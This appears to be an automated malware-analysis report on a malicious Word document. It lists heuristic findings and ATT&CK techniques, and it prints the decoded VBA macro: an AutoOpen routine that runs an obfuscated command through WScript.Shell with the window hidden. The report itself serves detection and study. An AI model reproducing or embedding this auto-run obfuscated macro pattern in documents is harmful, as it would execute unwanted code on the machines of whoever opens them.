MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for malicious Office documents. The script explicitly uses `CreateObject("WScript.Shell")` and the `Run` method, indicating an attempt to execute arbitrary commands. This strongly suggests the document is designed to download and execute a second-stage payload, likely leveraging the `WScript.Shell` object for this purpose.
Heuristics 8
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
On Error Resume Next ojqkiAKTO = CreateObject("WScript.Shell").Run(ChrW(2 + 6 + 9 + 10 + 40) + zvAiLSqDchIsA + siFSfwcM + bEFUjaiNL + isJLSOoiY + iWjdt + liCOtzzY + KUzEGiYhj + WPouMUzi + khHiNp + YDASzr + XzaLZGSwwU + FrrcnVWwLdY + wWOfTz + NiNEuLoklB + lNzmGKoLIkP + MlaDQcz + KHLpl + SzcvLr + nPoGlQfKZ + uzONfALL + wbVviKOabPs + UCBuOCOinzQ + BUwAqvoaBG + ifQsChEhmbAL, 380404241 - 380404241) End Sub -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next ojqkiAKTO = CreateObject("WScript.Shell").Run(ChrW(2 + 6 + 9 + 10 + 40) + zvAiLSqDchIsA + siFSfwcM + bEFUjaiNL + isJLSOoiY + iWjdt + liCOtzzY + KUzEGiYhj + WPouMUzi + khHiNp + YDASzr + XzaLZGSwwU + FrrcnVWwLdY + wWOfTz + NiNEuLoklB + lNzmGKoLIkP + MlaDQcz + KHLpl + SzcvLr + nPoGlQfKZ + uzONfALL + wbVviKOabPs + UCBuOCOinzQ + BUwAqvoaBG + ifQsChEhmbAL, 380404241 - 380404241) End Sub -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next ojqkiAKTO = CreateObject("WScript.Shell").Run(ChrW(2 + 6 + 9 + 10 + 40) + zvAiLSqDchIsA + siFSfwcM + bEFUjaiNL + isJLSOoiY + iWjdt + liCOtzzY + KUzEGiYhj + WPouMUzi + khHiNp + YDASzr + XzaLZGSwwU + FrrcnVWwLdY + wWOfTz + NiNEuLoklB + lNzmGKoLIkP + MlaDQcz + KHLpl + SzcvLr + nPoGlQfKZ + uzONfALL + wbVviKOabPs + UCBuOCOinzQ + BUwAqvoaBG + ifQsChEhmbAL, 380404241 - 380404241) End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 83,833 bytes but its declared streams total only 36,445 bytes — 47,388 bytes (57%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 745 bytes |
SHA-256: 65b940007ee01d6683bbdc520ede2a223426f762b6d05eef6239d8f0b93591d5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EnPIwkwa"
Sub AutoOpen()
On Error Resume Next
ojqkiAKTO = CreateObject("WScript.Shell").Run(ChrW(2 + 6 + 9 + 10 + 40) + zvAiLSqDchIsA + siFSfwcM + bEFUjaiNL + isJLSOoiY + iWjdt + liCOtzzY + KUzEGiYhj + WPouMUzi + khHiNp + YDASzr + XzaLZGSwwU + FrrcnVWwLdY + wWOfTz + NiNEuLoklB + lNzmGKoLIkP + MlaDQcz + KHLpl + SzcvLr + nPoGlQfKZ + uzONfALL + wbVviKOabPs + UCBuOCOinzQ + BUwAqvoaBG + ifQsChEhmbAL, 380404241 - 380404241)
End Sub
Attribute VB_Name = "BIGvBwSwFq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.